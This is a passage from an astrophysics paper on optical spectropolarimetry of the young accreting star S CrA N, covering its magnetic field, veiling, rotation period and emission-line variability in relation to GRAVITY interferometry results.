of \(\sim 6\) R\({}_{*}\), suggesting that S CrA N is in an unstable accretion regime. The truncation radius being much smaller than the size of the Br\(\gamma\) line emitting region, as measured with the GRAVITY interferometer (\(\sim 8\) R\({}_{*}\)), supports the presence of outflows, which is nicely corroborated by the line profiles presented in this work. Conclusions:The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated with the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constraints on a system that varies on a \(\sim\) 1 day timescale. 
## 1 Introduction Classical T Tauri stars are thought to accrete material from their surrounding disks through funnel flows along their magnetic field lines, following the magnetospheric accretion scenario (e.g., Camenzind 1990; Koenigl 1991; Espaillat 2022). These phenomena shape many properties of the accreting objects and can be investigated by spectroscopy, spectropolarimetry, and photometry as their host stars exhibit excess continuum emission in the optical and near-infrared ranges, hot and cold spots, as well as broad, intense, and variable emission lines in the visible and near-infrared ranges (e.g., Alencar et al. 2012, 2018; Sousa et al. 2021, 2023). The accretion regime depends on the large-scale magnetic field strength (i.e., usually a dipole), the angle between the dipolar magnetic-field and stellar rotation axes, and the mass accretion rate (Kulkarni and Romanova 2008; Blinova et al. 2016). It can be either stable when occurring through two funnels, one per hemisphere, or unstable when several equatorial tongues penetrate the stellar magnetosphere. These tongues are transient on timescales of the stellar rotation period and can coexist with stable accretion funnels (Kulkarni and Romanova 2008; Pantolmos et al. 2022). The transition between these regimes strongly depends on the mass accretion rate: unstable accretion is expected to be observed mostly in strong accretors rather than in low accretors (Blinova et al. 2016). Strong accretors allow us to probe a different accretion regime, through which all low-mass stars should go during their early pre-main sequence (PMS) evolution as they move away from the protostellar phase (Baraffe et al. 2017). Yet, they have been poorly explored until now, because their variability in the optical domain complicates their spectral analysis. Until recently, the structure of the magnetosphere has been mostly probed through indirect observations thanks to the measurements of magnetic field strength and topology (Donati et al. 1997), and mass accretion rate estimates (Manara et al. 2021; Alcala et al. 2021). The drastic improvement of sensitivity of optical long-baseline interferometers has opened a promising new way to probe the interaction between the young stars and their inner disks. The K-band interferometric beam-combiner GRAVITY at the VLTI (GRAVITY Collaboration et al. 2017a) makes it possible to spatially resolve the Br \(\gamma\) line emitting region for a few T Tauri stars (Gravity Collaboration et al. 2023). 
Combined with spectropolarimetry, this appears very promising as it allows one to compare the size of the Br \(\gamma\) line emitting region with that of the magnetosphere derived by spectropolarimetry, and thus to investigate the accretion-ejection processes at (sub-)astronomical unit scale (Bouvier et al. 2020; Gravity Collaboration et al. 2020, 2023). With the aim of studying the peculiar accretion regime of a strong accretor through complementary observing techniques, we focus our work on the North component of the young binary system S Coronae Australis (S CrA N) as it is one of the strongest accretors of the GRAVITY T Tauri sample (\(\dot{M}\sim 10^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\); Gahm et al. 2018; Sullivan et al. 2019). To complete the GRAVITY data set and better understand the accretion-ejection phenomena at play, we have conducted an observing campaign with the optical spectropolarimeter ESPaDOnS. S CrA is a T Tauri binary system whose components are coeval (Gahm et al. 2018 and references therein) and separated by about 1.4" (Reipurth and Zinnecker 1993). Due to the inverse P Cygni profiles of its hydrogen H\(\gamma\) and H\(\delta\) lines, Rydgren (1977) classified this system as a YY Ori object, a sub-class of PMS stars characterized by their excess in the Ultra-Violet (UV) and the inverse P Cygni structure in the high orders of the Balmer series (Walker 1972). Many spectroscopic studies in the optical and near-infrared ranges of S CrA have been reported in the literature and focused on characterizing its veiling (Prato et al. 2003), its variability (Edwards 1979; Sullivan et al. 2019), and more generally on the accretion-ejection processes at play (Gahm et al. 2018). From these spectral analyses, S CrA N appears to be highly obscured by a variable veiling and to exhibit a high mass accretion rate onto the star, suggesting that this star might be transitioning between the Class I and Class II stages of stellar evolution. S CrA has been part of the ALMA survey of protoplanetary disks in the Corona Australis region (Cazzoletti et al. 2019); a continuum emission at 1.3 mm with a half-width at half-maximum of about 0.22\({}^{\prime\prime}\) is detected around S CrA N; it exhibits neither clear substructures nor an inner cavity with radii larger than 25 au. S CrA N has also been observed in the mid-infrared range with the MIDI instrument of the VLTI (Schegerer et al. 2009; Varga et al. 2018): a half-flux radius of the continuum emitting region of about 1.4 au was derived, but the observations did not allow us to accurately constrain the disk properties. More recently, the near-infrared continuum emission of S CrA N has been partially resolved in the H-band with PIONIER (Anthonioz et al. 2015) and in the K-band with GRAVITY (GRAVITY Collaboration et al. 2017b, 2021), and a half-flux radius of about 0.1 au has been derived for this continuum emission. Moreover, by fitting the continuum K-band interferometric data obtained with GRAVITY, GRAVITY Collaboration et al. (2021) derived an inclination of the inner disk of 27\({}^{\circ}\pm 3^{\circ}\). Thanks to the spectrometric capabilities of GRAVITY, the Br\(\gamma\) emitting region close to the star has also been partially resolved (0.06-0.07 au), appearing more compact than the continuum (GRAVITY Collaboration et al. 2017b; Gravity Collaboration et al. 2023). In this paper, we report on the spectropolarimetric campaign we led on S CrA N in the optical range to complete the GRAVITY near-infrared interferometric study of Gravity Collaboration et al. (2023). 
The observations and the data processing are described in Section 2. We present our results in Section 3 and discuss them in Section 4. ## 2 Data ### Observations S CrA N was observed with ESPaDOnS (Donati 2003), the spectropolarimeter at Canada France Hawaii Telescope (CFHT), for 11 consecutive nights from the 21\({}^{\rm st}\) of June to the 2\({}^{\rm nd}\) of July 2018, plus one last observation on the 4\({}^{\rm th}\) of July. Altogether, \begin{table} \begin{tabular}{l c c c c c} \hline \hline Date & HJD & \(t_{\rm exp}\) & SNR(I) & SNR(V) & Seeing \\ (2018) & (-2458000) & (s) & & & (arcsec) \\ \hline June 21 & 290.96670 & 3562 & 159 & 121 & 0.43 \\ June 22 & 291.97893 & 3600 & 90 & 68 & 0.81 \\ June 23 & 292.95395 & 3600 & 118 & 93 & 0.58 \\ June 24 & 293.99200 & 3600 & 117 & 88 & 0.63 \\ June 25 & 294.93505 & 3600 & 124 & 94 & 0.52 \\ June 26 & 295.97417 & 3448 & 156 & 116 & 1.30 \\ June 27 & 296.94506 & 3600 & 114 & 84 & 1.35 \\ June 28 & 297.91663 & 3600 & 121 & 88 & 1.05 \\ June 29 & 298.94801 & 3600 & 115 & 86 & 0.50 \\ June 30 & 299.95373 & 3600 & 117 & 86 & 0.60 \\ July 01 & 300.90393 & 3600 & 114 & 80 & 0.62 \\ July 04 & 303.93473 & 3600 & 100 & 67 & 0.57 \\ \hline \end{tabular} \end{table} Table 1: Log of the ESPaDOnS observations of S CrA N including the Date of observation, Heliocentric Julian Date (HJD), total exposure time (\(t_{\rm exp}\)), Signal to Noise Ratios (SNR) as the average value computed in the order centered on 581 nm, and seeing as measured by the Mauna Kea Atmospheric Monitor (MKAM) at the time of observation. they represent a set of 12 observations over a spectral range from 367 nm to 1048 nm, with a spectral resolution \(R\sim 65\,000\). The log of the observations is given in Table 1. Each observation consists of Stokes \(I\), \(V\), and null (\(N\)) spectra per Heliocentric Julian Date (HJD). The Stokes \(I\) parameter represents the total intensity of the light and allows for a classical spectroscopic analysis at a very high resolution. The Stokes \(V\) parameter is the difference between left and right circularly polarized light, which provides the observer with information on the line-of-sight component of the magnetic field in the region where the light comes from. The \(N\) signal is computed in a way that cancels the polarization of the incoming light. It is used to check for spurious polarization signals in the Stokes \(V\) data: any detection in Stokes \(V\) tallying with a \(N\) signal significantly above its Root Mean Square (RMS) noise should be considered spurious. Since the separation between S CrA N and S CrA S is 1.4" while the average seeing at CFHT was 750 mas during our observations, we made sure that the contribution of S CrA S to the total observed flux was negligible (see Appendix A for the complete treatment). In the end, the average contribution of S CrA S is as low as 1.7%, with 3 observations exceeding a contribution of 5% : June 26, 27 and 28 with 9.0%, 9.3% and 5.3%, respectively. We considered these contributions negligible for the rest of the study but stayed vigilant to any unexpected behaviour that would come out from any of these three observations. ### Data reduction The data were reduced automatically through the Libre ESpRTI procedure (see Donati et al. 1997). This reduction also includes the normalization of the Stokes \(I\) continuum, which was imperfect in the case of S CrA N due to the high activity of the object. 
The numerous intense emission lines led to a biased estimation of the continuum level in some spectral windows. We used the SpeNT code developed by Martin et al. (2018) to refine the normalization of our spectra until the continuum level varied by no more than the RMS signal outside any line in Stokes \(I\). The code fits a third order spline to the continuum considering a \(\sigma\)-clipping procedure to automatically reject absorption/emission lines. Nevertheless, this procedure can be manually adjusted by visually rejecting any fixed point of the spline should the considered portion of the spectrum be highly variable. For S CrA N, we performed the fit on the average spectrum of all the Stokes \(I\) spectra in our sample. Then, the resulting normalization was applied to all the spectra. This procedure proved to be essential to obtain good normalized spectra for S CrA N. We recovered 12 good-quality spectra (one per night) displaying the usual telluric lines, photospheric lines, and classical emission lines for CTTS, as previously reported for this object (Gahm et al. 2018). We present a portion of the spectra in Fig. 1 where all these different features are visible at the same time. Photospheric lines are present but appear very weak on average (about 5% of the continuum level) due to veiling over the whole range of observation. The emission lines are particularly intense on average, with variable shapes (e.g. the iron lines on the left of Fig. 1). Many of the observed emission lines sensitive to the magnetic field exhibit significant Stokes \(V\) counterparts, suggesting a strong magnetic field (these lines are presented in Appendix B). Finally, the telluric lines were not removed since no line of interest was located inside a telluric region. ### Least Square Deconvolution One convenient way to look at these data is to compute their Least Square Deconvolution (LSD) profiles in both Stokes \(I\) and Stokes \(V\) spectra (Donati et al. 1997): the photospheric absorption lines and their Stokes \(V\) counterpart are weighted by their central wavelength, depth and Lande factor; then these weighted lines are averaged altogether over one observation. We built a mask that identifies the lines to include in this computation using the VALLD database1(Piskunov et al. 1995; Ryabchikova et al. 2015): by scanning the average spectrum over-plotted to a synthetic spectrum produced with the MARCS stellar atmosphere model (Gustafsson et al. 2008), we searched for undisturbed photospheric lines to be included. We paid particular attention not to include absorption lines contaminated by emission or telluric lines. Usually, the LSD \(I\) profiles obtained exhibit distortions that are attributable to spots located at the photosphere level. In the case of LSD \(V\), these profiles are shaped by the magnetic field along the line of sight at the surface of the star. The weak field approximation assumes that the broadening of the photospheric profiles due to the Zeeman effect (proportional to the local magnetic intensity along with the Lande factor and the central wavelength of a line) is negligible compared to all the other sources of broadening (instrumental broadening, thermal Doppler broadening, non-thermal Doppler broadening, microturbulent and macroturbulent velocities dispersions). Combined in quadratic sum, these effects correspond to a broadening of \(\Delta v_{\rm tot}~{}=~{}16.58\) km/s. 
For the specific case of S CrA N observed with ESPaDOnS, this \(\Delta v_{\rm tot}\) translates into \(B\ll 10\) kG. In other words, the use of the LSD profiles is justified under the condition that the surface averaged magnetic field does not reach 10 kG or more. Footnote 1: VALD database : [http://vald.astro.uu.se/](http://vald.astro.uu.se/) After applying the LSD computation with a Lande factor of 1.2 and a central wavelength of 500 nm to the complete Stokes \(I\) and \(V\) spectra, we obtain 12 set of LSD \(I\), LSD \(V\) and LSD \(N\) profiles (Fig. 2): one profile represents one observation date, which will be mentioned as (HJD - 2458000) hereafter (see Table 1), for convenience. We report that the LSD \(N\) profiles show no spurious signal at any velocity for any observation. Figure 1: Portion of all the normalised spectra. Each color stands for one observation. The same color code will be used for the rest of the study. ## 3 Results In this section, we present the methods used for the analysis of the set of data introduced above, and present our results. ### Fit of the Stokes \(I\) spectra We used the ZEEMAN code (Landstreet, 1988; Wade et al., 2001; Folsom et al., 2018) to derive the stellar parameters of S CrA N from the fitting of photospheric lines in our spectra. The ZEEMAN code solves the radiative transfer assuming Local Thermodynamic Equilibrium (LTE) in a 1D stellar atmosphere. We used the MARCS stellar atmosphere model and the theoretical properties of the photospheric lines are extracted from the VALD database as mentioned in Sect. 2.3. Then, the procedure for ZEEMAN is to adjust a synthetic spectrum to an observed one by minimizing a \(\chi^{2}\) function taking into account its seven free parameters, which are the effective temperature \(T_{\rm eff}\), the equatorial rotation velocity of the star projected on the line of sight \(v\sin i\), the radial velocity \(v_{r}\), the local veiling \(r\) taken to be an excess continuum flux as a fraction of continuum, the surface gravity \(\log g\), the micro-turbulent velocity \(v_{\rm mic}\), and the macro-turbulent velocity \(v_{\rm mac}\). A 7D \(\chi^{2}\) map being likely to display several local minima, we adjusted the parameters by pairs: \(T_{\rm eff}\) along with \(r\), then \(v\sin i\) along with \(v_{r}\), then \(v_{\rm mic}\) along with \(v_{\rm mac}\), \(\log g\) being adjusted on its own. At first, all constant parameters were set to an arbitrary value until a minimum \(\chi^{2}\) was reached for a considered pair of parameters. Then, the two previously fitted quantities were set constant to their new value, before fitting two new parameters until reaching a new minimum \(\chi^{2}\), which gives two different constant values to the new couple of parameters, and so on until we fitted all parameters. Then, the procedure is repeated until a whole cycle of fitting produces no variation in any of the parameters. We tested the sensitivity to initial conditions by setting different starting values for each parameter, but the procedure always converged to the same set of values, except for \(\log g\) and \(v_{\rm mic}\). Their values did not change, regardless of the number of cycles performed, which shows little sensitivity of our fit to these parameters. For the procedure to run, we fixed \(\log g=4.0\), which is common for CTTS, and derived the mass and radius as described in Sect. 4. 
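The alternating, pairwise \(\chi^{2}\) minimization described above can be sketched as follows. This is a schematic illustration only and not the actual ZEEMAN code: the function `synth_spectrum` (standing in for the LTE spectrum synthesis), the parameter names, the Nelder-Mead optimizer, and the convergence tolerance are all assumptions made for the example.

```python
import numpy as np
from scipy.optimize import minimize

# Parameter pairs adjusted in turn (log g is adjusted on its own, and is
# eventually fixed at 4.0 in the paper).
PAIRS = [("teff", "veiling"), ("vsini", "vrad"), ("vmic", "vmac"), ("logg",)]

def chi2(params, wave, obs, err, synth_spectrum):
    """Chi^2 between an observed spectral window and a veiled synthetic spectrum."""
    model = synth_spectrum(params, wave)            # placeholder LTE synthesis
    model_veiled = (model + params["veiling"]) / (1.0 + params["veiling"])
    return np.sum(((obs - model_veiled) / err) ** 2)

def fit_pairwise(params, wave, obs, err, synth_spectrum, max_cycles=20, tol=1e-3):
    """Adjust parameters two at a time, cycling until a full cycle changes nothing."""
    params = dict(params)
    for _ in range(max_cycles):
        previous = dict(params)
        for pair in PAIRS:
            x0 = np.array([params[name] for name in pair])

            def objective(x, pair=pair):
                trial = dict(params)
                trial.update(dict(zip(pair, x)))
                return chi2(trial, wave, obs, err, synth_spectrum)

            result = minimize(objective, x0, method="Nelder-Mead")
            params.update(dict(zip(pair, result.x)))
        # stop when a whole fitting cycle leaves every parameter unchanged
        if all(abs(params[k] - previous[k]) < tol * max(1.0, abs(previous[k]))
               for k in params):
            break
    return params
```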
Concerning \(v_{\rm mic}\), we retained a value of 1 km/s minimizing the \(\chi^{2}\) function for the procedure to run, but did not derive any uncertainties based on the \(\chi^{2}\) function. This fitting is done over 15 spectral windows (the central wavelengths of which are mentioned in Fig. 3) that display clear photospheric lines (i.e., deeper than 10% of the continuum level). All our results are gathered in the first four rows of Table 2. Each value corresponds to the average of the values over the 15 spectral windows, and the uncertainty corresponds to their standard deviation. We obtained an effective temperature of \(T_{\rm eff}=4300\pm 100\) K. We retrieved a rotational velocity of \(v\sin i=10\pm 2\) km/s, where \(i=0^{\circ}\) corresponds to a face-on object. We obtained a radial velocity of \(v_{r}=0\pm 1\) km/s, and a macroscopic turbulence velocity \(v_{\rm mac}=11\pm 3\) km/s. When plotting the veiling values against the spectral windows in which it is measured, no clear trend is observed, unlike in most CTTS where veiling decreases with wavelength in the optical domain (see e.g. Fischer et al., 2011). When plotting the veiling as a function of time for different spectral windows (Fig. 3), no clear periodicity can be identified, suggesting that an additional source must be at play, on top of the continuum emission from an accretion spot (e.g. accretion-powered emission lines). The mean veiling \(r\) over the 15 spectral windows and over time is as high as 7 on average, and ranges between 4 and 11. Figure 3: Evolution of the average optical veiling with time. For each date, each color point stands for the mean veiling over one spectral window whose center value is indicated in the caption. The error bars are centered on the average of the values computed over the 15 spectral windows and spread over their standard deviation. Figure 2: LSD \(I\) and \(V\) profiles of S CrA N sorted by HJD (HJD - 2458000, mentioned on the right of each plot), normalized by the maximum EW, observed at date 303.93. The color coding is the same as in Fig. 1. The spacing between two profiles stands for the time span between the observations. Each profile is represented with a solid colored line and is surrounded by its uncertainties in faded color. Black dotted lines represent the reference Voigt profile for the \(I\) profiles and the continuum for the \(V\) profiles. Dashed vertical lines represent the radial velocity of the star. \(V\) profiles are magnified by a factor 5 for clarity. ### Variability in LSD profiles The LSD \(I\) profiles presented in Fig. 2 show strong variability in intensity, which is unsurprising due to changes in veiling intensity. Indeed, we found a negative correlation between the mean veiling and the equivalent width (EW) of the LSD \(I\) profile at each date. Thus, both LSD \(I\) and \(V\) profiles were scaled to the greatest EW (occurring at the Julian date 2,458,303.93) so they all had the same EW. By doing so, one retains only their intrinsic shape variability presumably due to spots. The shape of the LSD \(I\) profiles changes entirely from one date to the following (Fig. 2). From date 291.98 to 292.95, for instance, the minimum intensity switches from the red to the blue side of the profile, and the small excess observed in the blue wing at first becomes reddened at 292.95. Then at date 303.93, the profile looks just like the one at 291.98 again, with only minor changes in intensity. 
To try and constrain the origin of this variability, we checked whether the LSD \(I\) profiles were deformed differently, depending on the intrinsic depth of the lines included in the LSD mask (see Appendix B for the detailed procedure). It results that no matter the depth limit of the lines taken into account for the LSD computation, the shapes of the profiles remain the same, with just a loss in signal-to-noise ratio (SNR) when removing more lines. We could not find a way to compute LSD \(I\) profiles with attenuated perturbations, and therefore adopted the LSD mask that gives the best SNR in the line profiles. The source of these distortions must break the spherical symmetry of the surface of the star, and considering the high variability of our LSD \(I\) profiles, we cannot interpret them as deviations from a rest profile. Hence, we compared the LSD \(I\) profiles to a synthetic Voigt profile. We adjusted this profile by fitting it to the median LSD \(I\) observed within a velocity range of [-25 km/s; +25 km/s]. This reference profile is shown as a dotted line over the LSD \(I\) profiles in Fig. 2. When looking at the \(V\) profiles, they also exhibit a variety of shapes, from flat (date 303.93) to typically anti-symmetric (e.g. at date 292.95). We also note that similar \(I\) profiles can display very different \(V\) profiles. That is the case for profiles at dates 293.99 and 303.93, where the \(I\) profiles are very similar, but the \(V\) profiles are respectively strong and flat. Conversely, at dates 291.98, 292.95, and 293.99, the \(V\) profiles remain constant in intensity over those 3 observations, with just a smooth drift of the centroid from negative to positive velocities. In contrast, the \(I\) profiles are drastically different. There is no evident correlation between the \(I\) and \(V\) variations, suggesting that brightness inhomogeneities at the surface of S CrA N might have additional sources besides brightness spots induced by the magnetic activity. To recover the stellar rotation period, we computed 2D periodograms for the LSD \(I\) and \(V\) profiles (Fig. 4). We ran a Lomb-Scargle periodogram routine over each velocity channel (i.e., wavelength) to build the periodograms, where a time series of 12 unevenly sampled observations were considered. We restrained the search for periods larger than 2 days (Shannon theorem applied to a 1 day sampling, which is the smallest sampling of our data) and smaller than 14 days. Any periodicity above -or near- 14 days cannot be considered reliable since that was the total span of our observations. False Alarm Probability (FAP) contours of 3% are drawn in Fig. 4. All the FAPs of this study were computed assuming white noise in the continuum, i.e. independent measurements, following the method described in Zechmeister & Kurster (2009). The 2D periodograms reveal no apparent periodicity in the LSD \(I\) profiles. While these profiles might be influenced by stochastic activity in the post-shock region (see, e.g. Petrov et al. 2011; Dodin & Lamzin 2012; Rei et al. 2018), which could explain the deformations observed and hide periodic features from hot/cool surface spots, the LSD \(V\) profiles are more robust to such a contamination since the intensity of the magnetic field decreases rapidly with distance to the stellar surface (\(\propto r^{-3}\) at least, for a pure dipole). 
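The per-velocity-channel periodogram analysis described above can be sketched with `astropy` as follows. This is an illustrative outline rather than the authors' code: the array names (`hjd`, `lsd_v_profiles`), the 500-point period grid, and the use of astropy's built-in analytic false-alarm estimate (the paper follows Zechmeister & Kurster 2009 under a white-noise assumption) are assumptions of the example.

```python
import numpy as np
from astropy.timeseries import LombScargle

def periodogram_2d(hjd, profiles, periods):
    """Lomb-Scargle power and false-alarm probability per velocity channel.

    hjd      : (n_obs,) observation times in days
    profiles : (n_obs, n_vel) LSD I or V profiles, one row per observation
    periods  : (n_per,) trial periods in days
    """
    frequency = 1.0 / periods
    n_vel = profiles.shape[1]
    power = np.zeros((len(periods), n_vel))
    fap = np.ones((len(periods), n_vel))
    for j in range(n_vel):
        ls = LombScargle(hjd, profiles[:, j])
        p = ls.power(frequency)
        power[:, j] = p
        # analytic false-alarm probability provided by astropy
        fap[:, j] = ls.false_alarm_probability(p, method="baluev")
    return power, fap

# Example: restrict the search to 2-14 d (Shannon limit for a ~1 d sampling and
# the ~14 d span of the run), then sum the power weighted by (1 - FAP) over the
# velocity channels of interest to obtain the 1D weighted periodogram.
periods = np.linspace(2.0, 14.0, 500)
# power, fap = periodogram_2d(hjd, lsd_v_profiles, periods)
# weighted = (power * (1.0 - fap)).sum(axis=1)
```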
While the LSD \(I\) profiles display no clear periodicity, we can compute, for each line of the LSD \(V\) periodogram, the 2D periodogram's powers weighted by a 1-FAP factor over a range of velocity narrowed to the region of variability of the profiles (i.e., [-20 km/s; +20 km/s]). We are left with a 1D weighted periodogram whose peak's maximum is the stellar rotation period and whose standard deviation is the uncertainty. That yields a period of \(7.6\pm 1.3\) days located at the extrema of the \(V\) profile, where the amplitude variation is the most important, strengthening the reliability of this signal detection. \begin{table} \begin{tabular}{l c c l l} \hline \hline Parameter & This work & Literature & Method in the literature & Our method (if different) \\ \hline \(T_{\rm eff}\)\([K]\) & \(4300\pm 100\) & \(4250\) & Fit of photospheric lines\({}^{a}\) & Fit of photospheric lines \\ & & \(4800\pm 400\) & Comparison to spectral type standard star\({}^{b}\) & Fit of photospheric lines \\ & & & & \\ \(v\) sin \(i\)\([km/s]\) & \(10\pm 2\) & \(12\) & Fit of photospheric lines\({}^{a}\) & \\ & & & & \\ \(r\) & \([4-11]\) & \(8.3\) & Fit of photospheric lines\({}^{a}\) & \\ & & \(0\pm 1\) & \(0.9\pm 2.5\) & Fit of photospheric lines\({}^{a}\) & \\ & & & \(129\) & \(uvby,\beta\) photometry\({}^{c}\) & \\ & & & \(138\pm 16\) & Light echoes analysis\({}^{d}\) & ”On-cloud” sub-region distance\({}^{e}\) \\ & & & & \\ \(L_{*}\)\([L_{\odot}]\) & \(1.67\pm 0.8\) & \(2.29^{+0.76}_{-0.65}\) & Fit of SED\({}^{b}\) & Distance-corrected value\({}^{b}\). \\ & & & & \\ \(M_{*}\)\([M_{\odot}]\) & \(0.8\pm 0.1\) & \(0.7^{f}\) & From \(T_{\rm eff}\) assuming an age of 2 Myr & Position in HR diagram \\ & & & & Position in HR diagram \\ & & & & \\ \(P_{*}\) [days] & \(7.3\pm 0.2\) & \(4.2\pm 1\) & Periodicity in the He I narrow component\({}^{d}\) & \\ & & & & Direct computation \\ \hline \end{tabular} 1 \end{table} Table 2: Stellar parameters of S CrA N. ### Variability in emission lines CTTS are known to show strong and broad Balmer emission lines, as well as a narrow emission in He I lines. They are all often associated with red-shifted absorption features, indicating infall of material (Edwards et al., 1994; Beristain et al., 2001). It is now well accepted that a good part of these lines are formed through magnetospheric accretion (Hartmann et al., 1994, 2016). In our spectra, the Balmer and He I lines show various features, both in emission and absorption, as well as strong variability. We therefore report below our analysis on this variability to understand the origin of formation of these lines, and how they can constrain the magnetospheric accretion processes in a strongly accreting T Tauri star as S CrA N. #### Helium I \(\lambda\)5876. This line can be composite with up to 3 distinct components, which are particularly discernible in the case of S CrA N (Fig. 5-top): * A narrow component (NC) which is asymmetric and goes from -30 km/s to 50 km/s and peaks around 0 km/s. Due to its very high excitation potential, this emission line is believed to trace accretion footprints at the surface of the star. * A broad component (BC), as wide as \(\pm\) 250 km/s and well reproduced by a Gaussian fit. Its origin is still poorly constrained, but might itself be composite. * An absorption component (AC) in the red wing of the broad component (between \(\sim\) 200 and \(\sim\) 350 km/s). Strong Zeeman signatures are present in Stokes V spectra (Fig. 5-bottom). 
The S-shaped signature spreads from -30 km/s to +50 km/s on average and is as strong as 20% of the continuum intensity. Due to its broadening and asymmetric shape, this \(V\) signal is attributed to the NC and thus traces the magnetic field at the footprint of the accretion columns. In order to study all the components separately, a fit with 3 independent Gaussian profiles was applied to each observed I profile. Each component is extracted by removing the models of the two other components from the profiles: the BC and AC Gaussian models were subtracted to the whole line as they did match the shape and intensity of the observed BC and AC at all phases. On the contrary, due to the intrinsic asymmetry of the NC, removing its Gaussian model left significant NC residuals in the extracted BC and AC profiles. Instead, a smoothed NC was subtracted from the original total profile, along with the AC/BC Gaussian model. This smoothed NC was obtained using a three-point moving average of the extracted NC. We performed radial velocity, equivalent width and longitudinal field measurements in the NC. The longitudinal field is obtained thanks to the first moment method (Donati et al., 1997; Wade et al., 2000) The equivalent width is computed between -30 km/s and +50 km/s. Finally, we measured the radial velocity of the NC's centroid by computing the first moment of the profile at each date. All three quantities are presented in Table 3 and Fig. 6. The radial velocity modulation was used to estimate the stellar period thanks to a point-like accretion spot model described in further detail in Pouilly et al. (2021). We obtained a period \(P=7.3\pm 0.2\) days. The 2D periodograms were computed for \(V\) profiles and all three Stokes \(I\) components (Fig. 7). Each emitting component displays its own periodicity. The center of the NC shows a \(7.4\pm 1.4\) days period with strong significance (FAP \(<\) 3%). However, this period drifts down to 6.6 \(\pm\) 1.3 days in the red wing (above +30 km/s). The BC shows a 3.2 \(\pm\) 0.3 days period with a much lower significance (FAP \(\sim\) 15%), whereas there is no signal at 7.4 days. The high power signal at long periods cannot be considered significant since it could not be observed for a full cycle, and the white noise assumption in the FAP computations tends to overestimate its significance level. The AC displays a 6.6 \(\pm\) 1.3 days period from 0 to +200 km/s, and a 3.4 \(\pm\) 0.4 days period beyond +200 km/s. Both periods are detected with a high significance level (FAP \(<\) 3%). All the derived periods are gathered and compared in Fig. 8, and will be discussed in Sec. 4. a persistent blue-shifted absorption is present at all phases (peaking at about -100 km/s). On top of this absorption, a narrow emission can be observed in H\(\delta\) and H\(\gamma\), along with a red-shifted absorption spreading from +50 to +300 km/s. A similar red-shifted absorption is barely detected in H\(\beta\) and cannot be seen in H\(\alpha\), although its underlying presence could explain the asymmetry of the far wings in the latter. The exact span of this absorption is not the same for all the lines though. The complexity of the Balmer lines can be interpreted as a multi-component origin of the hydrogen emission, coming from different phenomena and/or different locations in the inner disk and magnetospheric regions, which will be discussed in Section 4. 
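To make the He I \(\lambda\)5876 analysis described above concrete, the sketch below outlines the three-Gaussian decomposition and the first-moment quantities (equivalent width, centroid radial velocity, longitudinal field). It is only an illustrative outline: the initial guesses, the effective Lande factor, and the handling of the emission-line sign in the longitudinal-field integral are assumptions of ours, not values taken from the paper.

```python
import numpy as np
from scipy.optimize import curve_fit

C_KMS = 2.99792458e5  # speed of light [km/s]

def gauss(v, amp, v0, sigma):
    return amp * np.exp(-0.5 * ((v - v0) / sigma) ** 2)

def three_gaussians(v, *p):
    """NC + BC + AC model of the continuum-subtracted He I Stokes I profile
    (the AC amplitude is expected to come out negative)."""
    return gauss(v, *p[0:3]) + gauss(v, *p[3:6]) + gauss(v, *p[6:9])

def fit_components(v, stokes_i, p0):
    """Fit the three components; p0 = [amp, v0, sigma] x {NC, BC, AC} initial guesses."""
    popt, _ = curve_fit(three_gaussians, v, stokes_i - 1.0, p0=p0)
    return popt

def equivalent_width(v, flux, vmin=-30.0, vmax=50.0):
    m = (v >= vmin) & (v <= vmax)
    return np.trapz(flux[m], v[m])

def first_moment_velocity(v, flux):
    """Centroid (first moment) of an extracted emission component."""
    return np.sum(v * flux) / np.sum(flux)

def longitudinal_field(v, stokes_i, stokes_v, lambda0_nm=587.6, g_eff=1.0):
    """First-moment longitudinal field [G] (Donati et al. 1997; Wade et al. 2000),
    assuming lambda0 in nm and velocities in km/s; g_eff is a placeholder value.
    For an emission component the denominator changes sign (use I - 1 instead of 1 - I)."""
    num = np.trapz(v * stokes_v, v)
    den = np.trapz(1.0 - stokes_i, v)
    return -2.14e11 * num / (lambda0_nm * g_eff * C_KMS * den)
```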
### Correlations in spectral lines We computed correlation matrices based on the Pearson coefficients to highlight different behaviours within a line profile and/or to link different lines between them (see e.g. : Kurosawa et al., 2005; Pouilly et al., 2020). More explicitly, for two given lines, one can compute the correlation between each pixel (i.e., velocity channel or wavelength) of the first line and each pixel of the second line, thanks to the time series of these lines. Given a pixel \(i\) in the first line and a pixel \(j\) in the second line, the correlation coefficient \(R_{ij}\) between these pixels is given by: \[R_{ij}=\frac{C_{ij}}{\sqrt{C_{ii}C_{jj}}} \tag{1}\] with \(C_{ij}\) the covariance between \(i\) and \(j\) : \[C_{ij}=\frac{1}{N-1}\sum_{k=1}^{N}\left(F_{i,k}-\overline{F_{i}}\right)\left( F_{j,k}-\overline{F_{j}}\right) \tag{2}\] where \(N\) is the number of observations (12 here), \(F_{i,k}\) is the flux in pixel \(i\) for observation \(k\), and \(\overline{F_{i}}\) is the mean flux in pixel \(i\) over the \(N\) observations. The coefficients of \(R_{ij}\) hence range from -1 (perfect anti-correlation) to +1 (perfect correlation), with a null value meaning no correlation. To define some value above which we would consider a correlation level as significant, we computed 1 billion samples where two random variables were taken 12 times (one for each observation) in a white noise equivalent to our Stokes \(I\) RMS = 0.05. This gives a Gaussian distribution of \(R_{ij}\) centered on 0 and with \(\sigma=0.38\). We chose to take a 2\(\sigma\) level of significance, corresponding to \(|R_{ij}|\geq 0.76\) for significant correlation, while \(0.38\leq|R_{ij}|\leq 0.76\) will correspond to a moderate correlation, and \(|R_{ij}|\leq 0.38\) to low correlation. ### Correlations in He I. The decomposition of the Helium line into BC and NC components is well justified by the auto-correlation matrix of the whole line (Fig. 10-top-left). These components are neither correlated nor anti-correlated. Hence, their origin is linked to different processes. When checking for the correlations between each component and the Stokes \(V\) signature, the NC is well correlated with the positive peak of the \(V\) profile, while anti-correlated with the negative peak. The BC displays no clear correlation with any part of the \(V\) profile, confirming that the \(V\) signal is produced by the magnetic field in the region of formation of the NC, and is unrelated with the BC formation. \begin{table} \begin{tabular}{c c c c} \hline \hline Phase & Radial vel. & Equ. width & Long. 
